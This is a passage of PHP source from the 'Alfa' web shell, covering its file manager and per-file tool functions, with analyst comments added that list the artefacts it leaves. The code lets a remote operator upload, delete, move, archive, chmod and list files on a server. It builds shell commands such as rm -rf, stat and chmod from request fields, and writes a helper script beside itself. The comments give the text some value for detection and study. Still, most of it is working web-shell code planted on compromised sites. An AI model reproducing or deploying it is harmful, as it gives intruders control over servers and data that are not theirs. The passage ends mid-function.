  3118.             $data = alfaEx('cat "'.addslashes($file).'"',false,$cgi);
  3119.             if(strlen($data)>0){
  3120.                 return explode("\n", $data);
  3121.             }else{
  3122.                 return false;
  3123.             }
  3124.         }else{
  3125.             return false;
  3126.         }
  3127.     }else{
  3128.         return $array;
  3129.     }
  3130. }
  /**
   * Check whether a path is writable, first with PHP and then via the shell.
   *
   * When is_writable() reports false and _alfa_can_runCommand() is true, runs a
   * `[ -w "<file>" ]` test through alfaEx() (defined outside this view) and maps an
   * output of exactly "yes" to true, anything else to false.
   *
   * NOTE(review): the comparison assumes alfaEx() returns the output without a
   * trailing newline -- confirm against its definition.
   *
   * @param string $file Path to test.
   * @return bool
   */
  3131. function _alfa_is_writable($file){
  3132.     $check = false;
  3133.     $check = @is_writable($file);
  3134.     if(!$check){
  3135.         if(_alfa_can_runCommand()){
  3136.             $check = alfaEx('[ -w "'.trim(addslashes($file)).'" ] && echo "yes" || echo "no"');
  3137.             if($check == "yes"){
  3138.                 $check = true;
  3139.             }else{
  3140.                 $check = false;
  3141.             }
  3142.         }
  3143.     }
  3144.     return $check;
  3145. }
  /**
   * Check a path with is_dir(), falling back to a shell `[ <mode> "<dir>" ]` test.
   *
   * When is_dir() reports false and _alfa_can_runCommand() is true, the test operator
   * in $mode (default "-d") is evaluated through alfaEx() (defined outside this view)
   * and an output of exactly "yes" is mapped to true. Because $mode is caller-chosen,
   * the fallback can answer questions other than "is a directory".
   *
   * NOTE(review): $mode is only trimmed, not validated, before being placed on the
   * command line.
   *
   * @param string $dir  Path to test.
   * @param string $mode Operator for the shell test in the fallback path.
   * @return bool
   */
  3146. function _alfa_is_dir($dir,$mode="-d"){
  3147.     $check = false;
  3148.     $check = @is_dir($dir);
  3149.     if(!$check){
  3150.         if(_alfa_can_runCommand()){
  3151.             $check = alfaEx('[ "'.trim($mode).'" "'.trim(addslashes($dir)).'" ] && echo "yes" || echo "no"');
  3152.             if($check == "yes"){
  3153.                 return true;
  3154.             }else{
  3155.                 return false;
  3156.             }
  3157.         }
  3158.     }
  3159.     return $check;
  3160. }
  /**
   * File-manager page: applies the file operation requested in $_POST['alfa1'] (if
   * any), then lists the current directory as an HTML table.
   *
   * Request fields read here: alfa1 (operation or sort key), alfa2 (operand), c
   * (directory), f (selected names), charset, plus $_FILES['f'] and $_COOKIE['f'].
   * Session fields: act / f / c hold a pending copy, move, zip or unzip selection.
   *
   * Operations handled by the switch: uploadFile, mkdir, delete, paste (which performs
   * the pending copy / move / zip / unzip); any other value is stored as the pending
   * action.
   *
   * Analyst notes -- artefacts this function leaves behind, taken from the code below:
   *  - Archives named alfa_<1..1000>.zip created by the zip action.
   *  - A helper script written as "getdir.alfa" under an "alfacgiapi" directory beside
   *    the running script, used when PHP itself cannot list a directory.
   *  - Session keys "alfachdir_bash" and the __LAST_CWD__ entry.
   *  - The "!!! Access Denied !!!" banner when no listing can be obtained.
   *
   * Helpers alfahead(), AlfaNum(), alfaEx(), alfaWriteTocgiapi(), findicon() and the
   * __LAST_CWD__ constant are defined outside this view.
   */
  3161. function alfaFilesMan(){
  3162. alfahead();
  3163. AlfaNum(8,9,10,7,6,5,4);
  3164. echo '<div class="ajaxarea"><div class="header">';
  // NOTE(review): unserialize() is applied to a client-supplied cookie value.
  3165. if(!empty ($_COOKIE['f']))
  3166. $_COOKIE['f'] = @unserialize($_COOKIE['f']);
  3167. if(!empty($_POST['alfa1'])){
  3168. switch($_POST['alfa1']){
  // Upload: $move_cmd_file is assigned only when glob_chdir_false is set; otherwise it
  // is undefined (falsy) and move_uploaded_file() stores the file under the
  // client-supplied name in the current working directory.
  3169. case 'uploadFile':
  3170. if(isset($GLOBALS['glob_chdir_false'])){
  3171.     $alfa_canruncmd = _alfa_can_runCommand(true,true);
  3172.     $move_cmd_file = true;
  3173. }
  3174. $files = reArrayFiles($_FILES['f']);
  3175. foreach($files as $file){
  3176. if($move_cmd_file){
  3177.     alfaEx("cat '".addslashes($file['tmp_name'])."' > '".addslashes($_POST["c"]."/".$file['name'])."'");
  3178. }else{
  3179.     @move_uploaded_file($file['tmp_name'],$file['name']);
  3180. }
  // Printed unconditionally; neither branch's result is checked.
  3181. echo "uped...!<Br>";
  3182. }
  3183. break;
  3184. case 'mkdir':
  3185. $new_dir_cmd = false;
  3186. if(isset($GLOBALS['glob_chdir_false'])){
  3187.     if(_alfa_can_runCommand(true,true)){
  3188.         alfaEx("cd '".trim(addslashes($_POST['c']))."';mkdir '".trim(addslashes($_POST['alfa2']))."'");
  3189.     }
  3190. }else{
  3191. if(!@mkdir(trim($_POST['alfa2'])))
  3192. echo "<b><font color='red'>Can't create new dir !</b></font>";
  3193. }
  3194. break;
  3195. case 'delete':
  // Recursive delete helper, declared when this case runs. Entries are removed
  // depth-first, then the directory itself; all errors are suppressed.
  3196. function deleteDir($path){
  3197. $path = (substr($path,-1)=='/') ? $path:$path.'/';
  3198. $dh = @opendir($path);
  3199. while(($item = @readdir($dh)) !== false){
  3200. $item = $path.$item;
  3201. if((basename($item) == "..") || (basename($item) == "."))
  3202. continue;
  3203. $type = @filetype($item);
  3204. if ($type == "dir")
  3205. deleteDir($item);
  3206. else
  3207. @unlink($item);
  3208. }
  3209. @closedir($dh);
  3210. @rmdir($path);
  3211. }
  // Multi-select delete: each name is URL-decoded, removed via `rm -rf` and then
  // again via PHP (deleteDir/unlink).
  3212. if(is_array(@$_POST['f']))
  3213. foreach($_POST['f'] as $f){
  3214. if($f == '..')
  3215. continue;
  3216. $f = rawurldecode($f);
  3217. if(isset($GLOBALS["glob_chdir_false"])){
  3218.     if(_alfa_can_runCommand(true,true)){
  3219.         alfaEx("rm -rf '".addslashes($_POST['c'].'/'.$f)."'");
  3220.     }
  3221. }else{
  3222. alfaEx("rm -rf '".addslashes($f)."'",false,false);
  3223. if(@is_dir($f))
  3224. deleteDir($f);
  3225. else
  3226. @unlink($f);
  3227. }
  3228. }
  // Single-target delete taken from alfa2.
  3229. if(@is_dir(rawurldecode(@$_POST['alfa2']))&&rawurldecode(@$_POST['alfa2'])!='..'){
  3230. deleteDir(rawurldecode(@$_POST['alfa2']));
  3231. alfaEx("rm -rf '".addslashes($_POST['alfa2'])."'",false,false);
  3232. }else{
  3233. @unlink(rawurldecode(@$_POST['alfa2']));
  3234. }
  3235. if(isset($GLOBALS["glob_chdir_false"])){
  3236.     $source = rawurldecode(@$_POST['alfa2']);
  3237.     if($source!='..'&&!empty($source)){
  3238.         if(_alfa_can_runCommand(true,true)){
  3239.             alfaEx("cd '".trim(addslashes($_POST['c']))."';rm -rf '".addslashes($source)."'");
  3240.         }
  3241.     }
  3242. }
  3243. break;
  // Paste: executes whichever action was stored in the session by the default case.
  3244. case 'paste':
  3245. if($_SESSION['act'] == 'copy'&&isset($_SESSION['f'])){
  // Recursive copy of $c.$s into $d.$s.
  3246. function copy_paste($c,$s,$d){
  3247. if(@is_dir($c.$s)){
  3248. @mkdir($d.$s);
  3249. $h = @opendir($c.$s);
  3250. while (($f = @readdir($h)) !== false)
  3251. if (($f != ".") and ($f != ".."))
  3252. copy_paste($c.$s.'/',$f, $d.$s.'/');
  3253. } elseif(is_file($c.$s))
  3254. @copy($c.$s, $d.$s);
  3255. }
  3256. foreach($_SESSION['f'] as $f)
  3257. copy_paste($_SESSION['c'],$f, $GLOBALS['cwd']);
  3258. }elseif($_SESSION['act'] == 'move'&&isset($_SESSION['f'])){
  // move_paste() is declared but not called in this function; the move itself is
  // done with rename() below. Its body refers to copy_paste(), which is only
  // declared in the copy branch above.
  3259. function move_paste($c,$s,$d){
  3260. if(@is_dir($c.$s)){
  3261. @mkdir($d.$s);
  3262. $h = @opendir($c.$s);
  3263. while (($f = @readdir($h)) !== false)
  3264. if(($f != ".") and ($f != ".."))
  3265. copy_paste($c.$s.'/',$f, $d.$s.'/');
  3266. }elseif(@is_file($c.$s))
  3267. @copy($c.$s, $d.$s);
  3268. }
  3269. foreach($_SESSION['f'] as $f)
  3270. @rename($_SESSION['c'].$f, $GLOBALS['cwd'].$f);
  3271. }elseif($_SESSION['act'] == 'zip'&&isset($_SESSION['f'])){
  3272. if(class_exists('ZipArchive')){
  3273. $zip = new ZipArchive();
  // Archive name is alfa_<n>.zip with n from rand(1,1000); the second argument 1
  // to open() is the numeric value of ZipArchive::CREATE.
  3274. $zipX = "alfa_".rand(1,1000).".zip";
  3275. if($zip->open($zipX, 1)){
  3276. @chdir($_SESSION['c']);
  3277. foreach($_SESSION['f'] as $f){
  3278. if($f == '..')continue;
  3279. if(@is_file($_SESSION['c'].$f))
  3280. $zip->addFile($_SESSION['c'].$f, $f);
  3281. elseif(@is_dir($_SESSION['c'].$f)){
  3282. $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
  3283. foreach($iterator as $key=>$value){
  3284. $key = str_replace('\\','/',realpath($key));
  3285. if(@is_dir($key)){
  3286. if(in_array(substr($key, strrpos($key,'/')+1),array('.', '..')))continue;
  3287. }else{$zip->addFile($key,$key);}}}}
  3288. @chdir($GLOBALS['cwd']);
  3289. $zip->close();
  3290. __alert('>> '.$zipX.' << is created...');}}
  3291. }elseif($_SESSION['act'] == 'unzip'&&isset($_SESSION['f'])){
  3292. if(class_exists('ZipArchive')){
  3293. $zip = new ZipArchive();
  // Each selected archive is extracted into the current working directory.
  3294. foreach($_SESSION['f'] as $f) {
  3295. if($zip->open($_SESSION['c'].$f)){
  3296. $zip->extractTo($GLOBALS['cwd']);
  3297. $zip->close();}}}}
  3298. unset($_SESSION['f']);
  3299. break;
  // Any other alfa1 value (copy, move, zip, unzip, or a sort key) is remembered in
  // the session together with the selection and directory.
  3300. default:
  3301. if(!empty($_POST['alfa1'])){
  3302. $_SESSION['act'] = @$_POST['alfa1'];
  3303. $_SESSION['f'] = @$_POST['f'];
  3304. $_SESSION['c'] = @$_POST['c'];
  3305. }
  3306. break;
  3307. }
  3308. }
  // Directory to list: the remembered one when no 'c' was posted, else the posted one
  // (or cwd). A trailing "/.." is resolved by dropping the last path component, and
  // the stored value has ".." removed and "//" collapsed.
  3309. if(isset($_SESSION[__LAST_CWD__]) && !isset($_POST['c']) && $_SESSION[__LAST_CWD__] != ''){
  3310.     $dirContent = @scandir($_SESSION[__LAST_CWD__]);
  3311. }else{
  3312.     $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
  3313.     if(preg_match("#(.*)\/\.\.#", $_POST['c'], $res)){
  3314.         $path = explode('/', $res[1]);
  3315.         array_pop($path);
  3316.         $_POST['c'] = implode('/', $path);
  3317.     }
  3318.     $_SESSION[__LAST_CWD__] = str_replace(array("..","//"), array("","/"), $_POST['c']);
  3319. }
  3320. $cmd_dir = false;
  // Fallback when PHP cannot list the directory: a helper script is written to
  // alfacgiapi/getdir.alfa next to the running script and run with sh; its output
  // is parsed as JSON. The script body is not present in this copy of the file.
  3321. if($dirContent === false){
  3322.     if(_alfa_can_runCommand(true,true)){
  3323.         @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
  3324.         if(!isset($_SESSION["alfachdir_bash"])||@!file_exists("alfacgiapi/getdir.alfa")){
  3325.             $bash = "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";
  3326.             alfaWriteTocgiapi("getdir.alfa",$bash);
  3327.         }
  3328.         if(empty($_SESSION[__LAST_CWD__]))$_SESSION[__LAST_CWD__] = "/";
  3329.         $dirContent = alfaEx("cd alfacgiapi;sh getdir.alfa '".addslashes($_SESSION[__LAST_CWD__])."'");
  3330.         $dirContent = json_decode($dirContent, true);
  3331.         if(is_array($dirContent)){
  // The last decoded element is discarded -- presumably a terminator entry emitted
  // by the helper script; cannot be confirmed from this view.
  3332.             array_pop($dirContent);
  3333.             $cmd_dir = true;
  3334.         }else{
  3335.             $dirContent = false;
  3336.         }
  3337.         $_SESSION["alfachdir_bash"] = true;
  3338.     }
  3339. }
  // Loose comparison: an empty listing array is also treated as "access denied".
  3340. if($dirContent == false){
  3341. echo '<center><br><span style="font-size:16px;"><span style="color: red; -webkit-text-shadow: 1px 1px 13px;"><strong><b><big>!!! Access Denied !!!</b></big><br><br></strong></div>';
  3342. alfaFooter();
  3343. return;
  3344. }
  3345. global $sort;
  3346. $sort = array('name', 1);
  // Sort request encoded in alfa1 as s_<column>_<0|1>. The class [A-z] also matches
  // the punctuation characters that sit between 'Z' and 'a' in ASCII.
  3347. if(!empty($_POST['alfa1'])) {
  3348. if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['alfa1'], $match))
  3349. $sort = array($match[1], (int)$match[2]);
  3350. }
  3351. echo "<form onsubmit='fc(this);return false;' name='files' method='post'><table width='100%' class='main' cellspacing='0' cellpadding='2'><tr><th width='13px'><div class='myCheckbox' style='padding-left:0px;'><input type='checkbox' id='mchk' onclick='checkBox();' class='chkbx'><label for='mchk'></label></div></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";
  3352. $dirs = $files = array();
  3353. $n = count($dirContent);
  // Build one descriptor per entry. In $cmd_dir mode every attribute comes from the
  // decoded helper output; otherwise it is read with PHP's filesystem functions.
  3354. for($i=0;$i<$n;$i++){
  3355. if($cmd_dir){
  3356. $filename = $dirContent[$i]["name"];
  3357. $file_owner = $dirContent[$i]["owner"];
  3358. $file_group = $dirContent[$i]["group"];
  3359. $file_modify = @date('Y-m-d H:i:s', $dirContent[$i]["modify"]);
  3360. $file_perm = alfaPermsColor(array("class"=>$dirContent[$i]["permcolor"],"num"=>$dirContent[$i]["permnum"],"human"=>$dirContent[$i]["permhuman"]),true);
  3361. $file_size = $dirContent[$i]["size"];
  3362. $file_path = $_SESSION[__LAST_CWD__]."/".$dirContent[$i]["name"];
  3363. }else{
  3364. $filename = $dirContent[$i];
  // Owner/group fall back to the numeric id, then to "????", when no name resolves.
  3365. $ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($GLOBALS['cwd'].$filename)):array("name" => "????");
  3366. $gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($GLOBALS['cwd'].$filename)):array("name" => "????");
  3367. $file_owner = $ow['name']?$ow['name']:(function_exists("fileowner")?@fileowner($GLOBALS['cwd'].$filename):"????");
  3368. $file_group = $gr['name']?$gr['name']:(function_exists("filegroup")?@filegroup($GLOBALS['cwd'].$filename):"????");
  3369. $file_modify = @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $filename));
  3370. $file_perm = alfaPermsColor($GLOBALS['cwd'].$filename);
  3371. $file_size = @filesize($GLOBALS['cwd'].$filename);
  3372. $file_path = $GLOBALS['cwd'].$filename;
  3373. }
  3374. $tmp = array('name' => $filename,
  3375. 'path' => $file_path,
  3376. 'modify' => $file_modify,
  3377. 'perms' => $file_perm,
  3378. 'size' => $file_size,
  3379. 'owner' => $file_owner,
  3380. 'group' => $file_group
  3381. );
  // Classify: regular files go to $files; links and directories (except ".") go to
  // $dirs. Only link entries get a 'link' key.
  3382. if(!$cmd_dir){
  3383. if(@is_file($file_path))
  3384. $files[] = array_merge($tmp, array('type' => 'file'));
  3385. elseif(@is_link($file_path))
  3386. $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
  3387. elseif(@is_dir($file_path)&& ($filename != "."))
  3388. $dirs[] = array_merge($tmp, array('type' => 'dir'));
  3389. }else{
  3390.     if($dirContent[$i]["type"]=="file"){
  3391.         $files[] = array_merge($tmp, array('type' => 'file'));
  3392.     }else{
  3393.         if($dirContent[$i]["name"] != "."){
  3394.             $dirs[] = array_merge($tmp, array('type' => 'dir'));
  3395.         }
  3396.     }
  3397. }
  3398. }
  3399. $GLOBALS['sort'] = $sort;
  // Comparator for usort(): case-insensitive string compare on the chosen column, or
  // numeric compare for 'size'; the second sort element flips the direction. The size
  // branch never returns 0, so equal sizes are reported as "greater".
  3400. function alfaCmp($a, $b) {
  3401. if($GLOBALS['sort'][0] != 'size')
  3402. return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
  3403. else
  3404. return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
  3405. }
  3406. usort($files, "alfaCmp");
  3407. usort($dirs, "alfaCmp");
  // Directories first, then files.
  3408. $files = array_merge($dirs, $files);
  3409. $l=0;
  3410. $cc=0;
  // One table row per entry. The name is HTML-escaped first and $raw_name is the
  // URL-encoding of that escaped form. $f['path'], $f['link'], owner and group are
  // written into the markup without escaping.
  3411. foreach($files as $f){
  3412. $f['name'] = htmlspecialchars($f['name']);
  3413. $newname = mb_strlen($f['name'], 'UTF-8')>60?mb_substr($f['name'], 0, 60, 'utf-8').'...':$f['name'];
  3414. $checkbox = 'checkbox'.$cc;
  3415. $raw_name = rawurlencode($f['name']);
  3416. $icon = $GLOBALS['DB_NAME']['show_icons']?'<img src="'.findicon($f['name'],$f['type']).'" width="30" height="30">':'';
  3417. $style = $GLOBALS['DB_NAME']['show_icons']?'position:relative;display:inline-block;bottom:12px;':'';
  3418. echo '<tr'.($l?' class=l1':'').'><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="'.$raw_name.'" class="chkbx" id="'.$checkbox .'"><label for="'.$checkbox .'"></label></div></td><td>'.$icon.'<div style="'.$style.'"><a class="main_name" href=javascript:void(0) onclick="'.(($f['type']=='file')?'editor(\''.$raw_name.'\',\'auto\',\'\',\'\',\'\',\''.$f['type'].'\');">'.($GLOBALS['cwd'].$f['name']==$GLOBALS['__file_path']?"<span class='shell_name' style='font-weight:unset;'>".$f['name']."</span>":htmlspecialchars($newname)):'g(\'FilesMan\',\''.$f['path'].'\');" title=' . $f['link'] . '><b>| ' . htmlspecialchars($f['name']) . ' |</b>').'</a></td></div><td><span style="font-weight:unset;" class="main_size">'.(($f['type']=='file')?alfaSize($f['size']):$f['type']).'</span></td><td><span style="font-weight:unset;" class="main_modify">'.$f['modify'].'</span></td><td><span style="font-weight:unset;" class="main_owner_group">'.$f['owner'].'/'.$f['group'].'</span></td><td><a href=javascript:void(0) onclick="editor(\''.$raw_name.'\',\'chmod\',\'\',\'\',\'\',\''.$f['type'].'\')">'.
  3419. $f['perms'].'</td><td><a class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'rename\',\'\',\'\',\'\',\''.$f['type'].'\')">R</a> <a class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'touch\',\'\',\'\',\'\',\''.$f['type'].'\')">T</a>'.(($f['type']=='file')?' <a class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'edit\',\'\',\'\',\'\',\''.$f['type'].'\')">E</a> <a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$raw_name.'\', \'download\')">D</a>':'').'<a class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # '.addslashes(rawurldecode($f['name'])).' # ?\'); chk ? g(\'FilesMan\',null,\'delete\', \''.$raw_name.'\') : \'\';"> X </a></td></tr>';
  // Alternate the row class and advance the checkbox id counter.
  3420. $l = $l?0:1;
  3421. $cc++;
  3422. }
  // Bulk-action selector; 'charset' is reflected from the request without escaping.
  3423. echo "<tr><td colspan=7>
  3424. <input type=hidden name=a value='FilesMan'>
  3425. <input type=hidden name=c value='".htmlspecialchars((isset($GLOBALS['glob_chdir_false'])?$_POST['c']:$GLOBALS['cwd']))."'>
  3426. <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
  3427. <select id='tools_selector' name='alfa1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete' selected>Delete</option><option value='zip'>Add 2 Compress (zip)</option><option value='unzip'>Add 2 Uncompress (zip)</option><option value='paste'>Paste / Zip / Unzip </option></select>
  3428. <input type='submit' value=' '>
  3429. </form></table></div></div>";
  3430. alfafooter();
  3431. }
  3432. function alfaFilesTools(){
        // Analyst note: per-file action handler of this web shell's file manager.
        // Every input comes from the request body:
        //   $_POST['c']     - directory to work in
        //   $_POST['alfa1'] - file name (raw-URL-decoded below; original kept in $alfa1_decoded)
        //   $_POST['alfa2'] - action: auto, mkfile, view, highlight, delete, chmod, edit,
        //                     hexdump, rename, touch, image
        //   $_POST['alfa3'] - action argument (new name, mode string, time string, file body)
        //   $_POST['alfa4'] - echoed back into inline <script> blocks as an element id / map key
        // When chdir() into $_POST['c'] fails, the function switches to a fallback that builds
        // shell command strings and hands them to alfaEx(). alfaEx(), _alfa_can_runCommand(),
        // _alfa_is_writable(), __read_file() and __write_file() are defined outside this excerpt;
        // alfaEx() presumably executes the string as a command - confirm against its definition.
        // Detection: on that fallback path the PHP / web-server account is the parent of
        // stat, file, touch, chmod, mv, rm, cat, base64 and identify processes.
        // Output is written with echo; the function returns nothing.
  3433. alfahead();
  3434. echo '<div class="filestools">';
  3435. if(isset($_POST['alfa1']))$_POST['alfa1'] = rawurldecode($_POST['alfa1']);
  3436. $alfa1_decoded = $_POST['alfa1'];
  3437. $chdir_fals = false;
        // chdir() failed: address the file as c/alfa1 and, if commands can be run, collect
        // type/owner/group/size/mtime/mode via `stat` plus a read/write test via the shell.
  3438. if(!@chdir($_POST['c'])){
  3439.     $chdir_fals = true;
  3440.     $_POST['alfa1'] = $_POST["c"]."/".$_POST["alfa1"];
  3441.     $alfa_canruncmd = _alfa_can_runCommand(true,true);
  3442.     if($alfa_canruncmd){
  3443.         $slashed_alfa1 = addslashes($_POST['alfa1']);
  3444.         $file_info = explode(":", alfaEx('stat -c "%F:%U:%G:%s:%Y:0%a:%A" "'.$slashed_alfa1.'"'));
  3445.         $perm_color_class = alfaEx("if [[ -w '".$slashed_alfa1."' ]]; then echo main_green_perm; elif [[ -r '".$slashed_alfa1."' ]]; then echo main_white_perm; else echo main_red_perm; fi");
  3446.     }
  3447. }
        // 'auto' resolves to 'image' or 'view': getimagesize() first, then `file --mime-type`
        // on the fallback path.
  3448. if($_POST['alfa2'] == 'auto'){
  3449. if(is_array(@getimagesize($_POST['alfa1']))){
  3450. $_POST['alfa2'] = 'image';
  3451. }else{
  3452.     $_POST['alfa2'] = 'view';
  3453.     if($chdir_fals){
  3454.         if($alfa_canruncmd){
  3455.             $mime = explode(":", alfaEx("file --mime-type '".addslashes($_POST['alfa1'])."'"));
  3456.             $mimetype = $mime[1];
  3457.             if(!empty($mimetype)){
  3458.                 if(strstr($mimetype, "image")){
  3459.                     $_POST['alfa2'] = 'image';
  3460.                 }
  3461.             }
  3462.         }
  3463.     }
  3464. }
  3465. }
        // Remember the requested new name so the action links below point at it.
  3466. if($_POST['alfa2'] == "rename" && !empty($_POST['alfa3']) && @is_writable($_POST['alfa1'])){$rename_cache = $_POST['alfa3'];}
        // 'mkfile': create an empty file (shell `touch` on the fallback path, fopen(...,'w')
        // otherwise); when that works the action becomes 'edit'.
  3467. if(@$_POST['alfa2'] == 'mkfile'){
  3468. $_POST['alfa1'] = trim($_POST['alfa1']);
  3469. if($chdir_fals&&$alfa_canruncmd){
  3470.     if(_alfa_is_writable($_POST["c"])){
  3471.         alfaEx("cd '".addslashes($_POST["c"])."';touch '".addslashes($alfa1_decoded)."'");
  3472.         $_POST['alfa2'] = "edit";
  3473.     }
  3474. }
  3475. if(!@file_exists($_POST['alfa1'])){
  3476. $fp = @fopen($_POST['alfa1'], 'w');
  3477. if($fp){
  3478. $_POST['alfa2'] = "edit";
  3479. fclose($fp);
  3480. }
  3481. }else{
  3482. $_POST['alfa2'] = "edit";
  3483. }
  3484. }
        // Target missing: print the error banner and stop.
  3485. if(!_alfa_file_exists(@$_POST['alfa1'])){
  3486. echo __pre()."<center><p><div class=\"txtfont\"><font color='red'>!...FILE DOEST NOT EXITS...!</font></div></p></center></div><script>editor_error=false;removeHistory('".$_POST['alfa4']."');</script>";
  3487. alfaFooter();
  3488. return;
  3489. }
        // Size / owner / group / permission for the info line: taken from the `stat` output on
        // the fallback path, otherwise from PHP's filesystem and posix functions, with a
        // `stat -c "%U:%G"` call as a last resort when the names come back empty.
  3490. if($chdir_fals){
  3491. $filesize = $file_info[3];
  3492. $uid["name"] = $file_info[1];
  3493. $gid["name"] = $file_info[2];
  3494. $permcolor = alfaPermsColor(array("class"=>$perm_color_class,"num"=>$file_info[5],"human"=>$file_info[6]),true);
  3495. }else{
  3496. $uid = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($_POST['alfa1'])):'';
  3497. $gid = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($_POST['alfa1'])):'';
  3498. if(!$uid&&!$gid){
  3499. $uid['name'] = function_exists("fileowner")?@fileowner($_POST['alfa1']):'';
  3500. $gid['name'] = function_exists("filegroup")?@filegroup($_POST['alfa1']):'';
  3501. }
  3502. $permcolor = alfaPermsColor($_POST['alfa1']);
  3503. $filesize = @filesize($_POST['alfa1']);
  3504. if(!isset($uid['name'],$gid['name'])||empty($uid['name'])||empty($gid['name'])){
  3505.     if(_alfa_can_runCommand()){
  3506.         list($uid['name'],$gid['name']) = explode(":", alfaEx('stat -c "%U:%G" "'.addslashes($_POST["c"]."/".$_POST["alfa1"]).'"'));
  3507.     }
  3508. }
  3509. }
  3510. echo '<span class="editor_file_info_vars">Name:</span> '.htmlspecialchars($alfa1_decoded).' <span class="editor_file_info_vars">Size:</span> '.alfaSize($filesize).' <span class="editor_file_info_vars">Permission:</span> '.$permcolor.' <span class="editor_file_info_vars">Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].' <span class="editor_file_info_vars">Directory:</span> '.str_replace("//", "/",($chdir_fals?"":$_POST['c'].'/').$_POST['alfa1']).'<br><br>';
  3511. if(empty($_POST['alfa2']))$_POST['alfa2'] = 'view';
        // Action menu: directories get Chmod/Rename/Touch only, files get the full list.
  3512. if(!_alfa_is_dir($_POST['alfa1'])){
  3513. $m = array('View', 'Edit', 'Download', 'Highlight', 'Chmod', 'Rename', 'Touch', 'Delete', 'Image', 'Hexdump');
  3514. $ftype = "file";
  3515. }else{
  3516. $m = array('Chmod', 'Rename', 'Touch');
  3517. $ftype = "dir";
  3518. }
  3519. foreach($m as $v)
  3520. echo $v == 'Delete' ? '<a href="javascript:void(0);" onclick="var chk=confirm(\'Are You Sure For Delete This File ?\');chk?editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\'):\'\';"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a> ' : '<a href="javascript:void(0);" onclick="editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\')"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a>';
  3521. echo '<br><br>';
  3522. switch($_POST['alfa2']){
        // view: print the file contents, HTML-escaped.
  3523. case 'view':
  3524. @chdir($_POST['c']);
  3525. echo '<div class="editor-view"><div class="view-content"><p><button style="border-radius:10px;" class="button" onClick="copyToClipboard(\'view_ml_content\');">copy to clipboard</button></p><pre class="ml1" id="view_ml_content">';
  3526. echo htmlspecialchars(__read_file($_POST['alfa1']));
  3527. echo '</pre></div></div>';
  3528. break;
        // highlight: same content through highlight_file(), with span tags rewritten to font tags.
  3529. case 'highlight':
  3530. @chdir($_POST['c']);
  3531. if(@is_readable($_POST['alfa1'])){
  3532. echo '<div class="editor-view"><div class="view-content"><div class="ml1" style="background-color: #e1e1e1;color:black;">';
  3533. $code = @highlight_file($_POST['alfa1'],true);
  3534. echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div></div></div>';
  3535. }
  3536. break;
        // delete: unlink(); if that fails and commands can be run, `rm -f` through alfaEx().
  3537. case 'delete':
  3538. @chdir($_POST['c']);
  3539. if(@is_writable($_POST['alfa1'])||isset($GLOBALS["glob_chdir_false"])){
  3540. $deleted = true;
  3541. if(!@unlink($_POST['alfa1'])){
  3542.     $deleted = false;
  3543.     if($alfa_canruncmd){
  3544.         if(_alfa_is_writable($_POST['alfa1'])){
  3545.             alfaEx("rm -f '".addslashes($_POST['alfa1'])."'");
  3546.             $deleted = true;
  3547.         }
  3548.     }
  3549. }
  3550. if($deleted)echo 'File Deleted...<script>var elem = $("'.$_POST['alfa4'].'").parentNode;elem.parentNode.removeChild(elem);delete editor_files["'.$_POST['alfa4'].'"];</script>';else echo 'Error...';}
  3551. break;
        // chmod: alfa3 is read digit by digit as an octal mode; PHP chmod() first, shell chmod
        // on the fallback path. The form is then re-rendered with the current mode.
  3552. case 'chmod':
  3553. @chdir($_POST['c']);
  3554. if(!empty($_POST['alfa3'])){
  3555. $perms = 0;
  3556. for($i=strlen($_POST['alfa3'])-1;$i>=0;--$i)
  3557. $perms += (int)$_POST['alfa3'][$i]*pow(8, (strlen($_POST['alfa3'])-$i-1));
  3558. if(!@chmod($_POST['alfa1'], $perms)){
  3559. if($chdir_fals&&$alfa_canruncmd){
  3560. alfaEx("cd '".addslashes($_POST["c"])."';chmod ".addslashes($_POST['alfa3'])." '".addslashes($alfa1_decoded)."'");
  3561. echo('Success!');
  3562. }else{
  3563. echo '<font color="#FFFFFF"><b>Can\'t set permissions!</b></font><br><script>document.mf.alfa3.value="";</script>';}
  3564. }else{echo('Success!');}
  3565. }
  3566. clearstatcache();
  3567. AlfaNum(8,9,10,7,6,5,4,2,1);
  3568. if($chdir_fals){
  3569.     $file_perm = $file_info[5];
  3570. }else{
